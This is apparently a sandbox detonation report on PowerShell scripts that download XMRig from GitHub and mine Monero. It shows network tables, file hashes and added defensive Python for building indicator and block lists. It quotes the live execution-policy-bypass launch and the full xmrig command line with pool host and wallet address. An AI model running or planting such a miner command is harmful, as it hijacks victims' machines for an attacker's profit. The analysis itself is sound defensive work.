US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/2216-0-0x00007FFF0B583000-0x00007FFF0B585000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trfhy2mu.jxb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:22

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 242.137.73.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
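Read in order, the table shows GitHub being resolved and contacted first, then objects.githubusercontent.com (where GitHub release assets are served from), and only afterwards the pool host from the xmrig command line; the in-addr.arpa rows are reverse lookups, most of them for addresses that were just contacted. The following is an added example written for this page, not the sandbox's own code: it parses the rows above, rebuilds that sequence as a labelled chain, splits the reverse lookups into those that match a recorded TCP destination and those that do not, and produces a block list and a watch list. POOL_HOST is the -o target from the Processes section. Labelling the GitHub connections as the payload fetch is an inference from their position relative to the dropped xmrig-6.21.3\xmrig.exe, not a fact the report states.

```python
"""Turn the Network table into the ordered download-then-mine sequence and
separate the sandbox's reverse-DNS noise from real indicators.

Added example written for this page; not the sandbox's code. The rows are
copied from the table. POOL_HOST is the -o target from the Processes
section. Calling the GitHub connections the payload fetch is an inference
from ordering, not something the report itself states.
"""
NETWORK_TABLE = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 242.137.73.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
"""

POOL_HOST = "rx.unmineable.com"
DOWNLOAD_HOSTS = {"github.com", "objects.githubusercontent.com"}
PTR_SUFFIX = ".in-addr.arpa"


def parse_rows(text):
    """Parse 'Country Destination Domain Proto' rows into dicts."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                      # header or blank line
        cc, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"cc": cc, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_ip(domain):
    """Invert a reverse-lookup name: 133.111.199.185.in-addr.arpa -> 185.199.111.133."""
    return ".".join(reversed(domain[:-len(PTR_SUFFIX)].split(".")))


def stage_for(domain):
    if domain in DOWNLOAD_HOSTS:
        return "payload download"
    if domain == POOL_HOST or domain.endswith(".unmineable.com"):
        return "mining pool"
    return "unclassified"


def build_chain(rows):
    """Distinct TCP destinations in first-seen order, each with a stage label."""
    chain, seen = [], set()
    for r in rows:
        if r["proto"] != "tcp" or r["domain"] in seen:
            continue
        seen.add(r["domain"])
        chain.append({**r, "stage": stage_for(r["domain"])})
    return chain


def unexplained_ptr(rows):
    """Addresses that were reverse-resolved but never appear as a TCP
    destination in the table. A reverse lookup for an address that was just
    contacted is the sandbox naming its peer; the remainder are the ones an
    analyst has to run down separately."""
    contacted = {r["ip"] for r in rows if r["proto"] == "tcp"}
    return {ptr_ip(r["domain"]) for r in rows
            if r["domain"].endswith(PTR_SUFFIX)
            and ptr_ip(r["domain"]) not in contacted}


def iocs(rows):
    """Pool endpoints go on the block list; GitHub is shared infrastructure
    and only goes on a watch list."""
    out = {"block": [], "watch": []}
    for c in build_chain(rows):
        key = (c["domain"], c["ip"], c["port"])
        if c["stage"] == "mining pool":
            out["block"].append(key)
        elif c["stage"] == "payload download":
            out["watch"].append(key)
    return out


if __name__ == "__main__":
    rows = parse_rows(NETWORK_TABLE)
    for step in build_chain(rows):
        print(f'{step["stage"]:17} {step["domain"]} -> {step["ip"]}:{step["port"]} ({step["cc"]})')
    print("reverse lookups without a matching connection:", sorted(unexplained_ptr(rows)))
    print(iocs(rows))
```

Four of the reverse lookups in this table (for 52.111.236.23, 20.42.73.26, 23.73.137.242 and 199.232.210.172) have no TCP row behind them; the report records nothing further about them, so they stay on the analyst's list rather than in the IOC set.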

Files

memory/908-0-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/908-5-0x000001FABBC90000-0x000001FABBCB2000-memory.dmp

memory/908-6-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-9-0x000001FAD42F0000-0x000001FAD4366000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpehszfz.mdt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/908-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-48-0x000001FAD42B0000-0x000001FAD42C2000-memory.dmp

memory/908-61-0x000001FABBD00000-0x000001FABBD0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4444-90-0x000001C1BF750000-0x000001C1BF770000-memory.dmp

memory/4444-91-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-92-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/908-93-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/908-94-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4444-96 through memory/4444-156 (61 consecutive dumps of the same region): 0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp
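Two files appear in the Files section alongside the memory dumps, and only one of them is the attacker's. __PSScriptPolicyTest_<random>.<random>.ps1 is written by PowerShell itself into %TEMP% to find out whether AppLocker/WDAC enforces script policy, and its body is the single byte "1"; the MD5, SHA-1 and SHA-256 recorded for it above are exactly the digests of "1". xmrig-6.21.3\xmrig.exe, by contrast, is the dropped payload, and its hashes are the ones worth keeping. The following is an added example written for this page, not the sandbox's code: it proves the probe file from its hashes rather than from its name and emits only the real payload as a hash IOC. Entries are copied from the report; the behavioral15 probe entry with a different hash set is included as a second input so the check reports whatever its hashes support. The line-ending variants of the probe body are assumptions.

```python
"""Tell the PowerShell policy-probe file in the Files section apart from the
real dropped payload by checking the recorded hashes against the probe's
known body.

Added example written for this page; not the sandbox's code. PowerShell
writes __PSScriptPolicyTest_<random>.<random>.ps1 into %TEMP% to test
whether AppLocker/WDAC enforces script policy; that file holds the single
byte "1". Entries are copied from the report. The line-ending variants of
the body are assumptions, kept so the check reports what the hashes show.
"""
import hashlib
import re

FILES = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpehszfz.mdt.ps1",
     "md5": "c4ca4238a0b923820dcc509a6f75849b",
     "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "md5": "205ad9eb6acd6f58752899669b69fe74",
     "sha1": "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "sha256": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"},
    # Probe entry as recorded in the behavioral15 detonation of this report.
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hnyfvmju.11x.ps1",
     "md5": "d17fe0a3f47be24a6453e9ef58c94641",
     "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"},
]

POLICY_TEST_RE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.IGNORECASE)
# b"1" is the documented body; the other two are assumed line-ending variants.
PROBE_BODIES = (b"1", b"1\r\n", b"1\n")
ALGOS = ("md5", "sha1", "sha256")


def digests(data):
    return {a: hashlib.new(a, data).hexdigest() for a in ALGOS}


def classify_file(entry):
    """('powershell_policy_probe', body) when the hashes prove the probe body,
    ('probe_name_unverified', None) when only the name matches,
    ('dropped_file', None) for everything else."""
    if POLICY_TEST_RE.search(entry["path"]):
        present = [a for a in ALGOS if a in entry]
        for body in PROBE_BODIES:
            d = digests(body)
            if present and all(entry[a].lower() == d[a] for a in present):
                return "powershell_policy_probe", body
        return "probe_name_unverified", None
    return "dropped_file", None


def payload_iocs(entries):
    """(filename, sha256) for every entry that is not a sandbox-side artifact."""
    return [(e["path"].rsplit("\\", 1)[-1], e["sha256"])
            for e in entries if classify_file(e)[0] == "dropped_file"]


if __name__ == "__main__":
    for e in FILES:
        print(classify_file(e), e["path"])
    print(payload_iocs(FILES))
```

The same xmrig.exe hash set (MD5 205ad9eb..., SHA-256 2025f4fe...) is recorded in every detonation of this report, so it is a stable indicator for this sample; the probe file's name and hash vary and should never be turned into one.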

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:30

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows, no indicator details recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 89.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

memory/3664-0-0x00007FFC7C303000-0x00007FFC7C305000-memory.dmp

memory/3664-1-0x00000259E9630000-0x00000259E9652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hnyfvmju.11x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3664-11-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/3664-12-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/3664-14-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/3664-16-0x00000259E96A0000-0x00000259E96AA000-memory.dmp

memory/3664-15-0x00000259EA8A0000-0x00000259EA8B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4584-47-0x000002648CEB0000-0x000002648CED0000-memory.dmp

memory/4584-48-0x000002648CF00000-0x000002648CF20000-memory.dmp

memory/4584-49-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-50-0x000002648D1D0000-0x000002648D1F0000-memory.dmp

memory/4584-51-0x000002648D1B0000-0x000002648D1D0000-memory.dmp

memory/4584-52-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/3664-53-0x00007FFC7C303000-0x00007FFC7C305000-memory.dmp

memory/3664-54-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/4584-55-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/3664-56-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/4584-59-0x000002648D1B0000-0x000002648D1D0000-memory.dmp

memory/4584-58-0x000002648D1D0000-0x000002648D1F0000-memory.dmp

memory/4584-57-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-60 through memory/4584-118 (59 consecutive dumps of the same region): 0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:27

Platform

win10-20240404-en

Max time kernel

1788s

Max time network

1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows, no indicator details recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4052-3-0x00007FFFEE743000-0x00007FFFEE744000-memory.dmp

memory/4052-5-0x000001F032B40000-0x000001F032B62000-memory.dmp

memory/4052-6-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-9-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-10-0x000001F033060000-0x000001F0330D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzggcjbu.efi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4052-25-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-48-0x000001F033020000-0x000001F033032000-memory.dmp

memory/4052-61-0x000001F032BB0000-0x000001F032BBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4168-90-0x0000021D34370000-0x0000021D34390000-memory.dmp

memory/4168-91-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4052-92-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-94-0x00007FFFEE743000-0x00007FFFEE744000-memory.dmp

memory/4168-93-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4052-95-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-96-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4168-97 through memory/4168-157 (61 consecutive dumps of the same region): 0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:29

Platform

win7-20240221-en

Max time kernel

1557s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Network

N/A

Files

memory/2704-4-0x000007FEF4D5E000-0x000007FEF4D5F000-memory.dmp

memory/2704-5-0x000000001B310000-0x000000001B5F2000-memory.dmp

memory/2704-6-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

memory/2704-7 through memory/2704-12 (6 consecutive dumps of the same region): 0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:31

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows, no indicator details recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4540-0-0x00007FF8AF043000-0x00007FF8AF045000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e4ndc4ea.hkl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4540-9-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/4540-10-0x000001AE9FA80000-0x000001AE9FAA2000-memory.dmp

memory/4540-11-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/4540-12-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

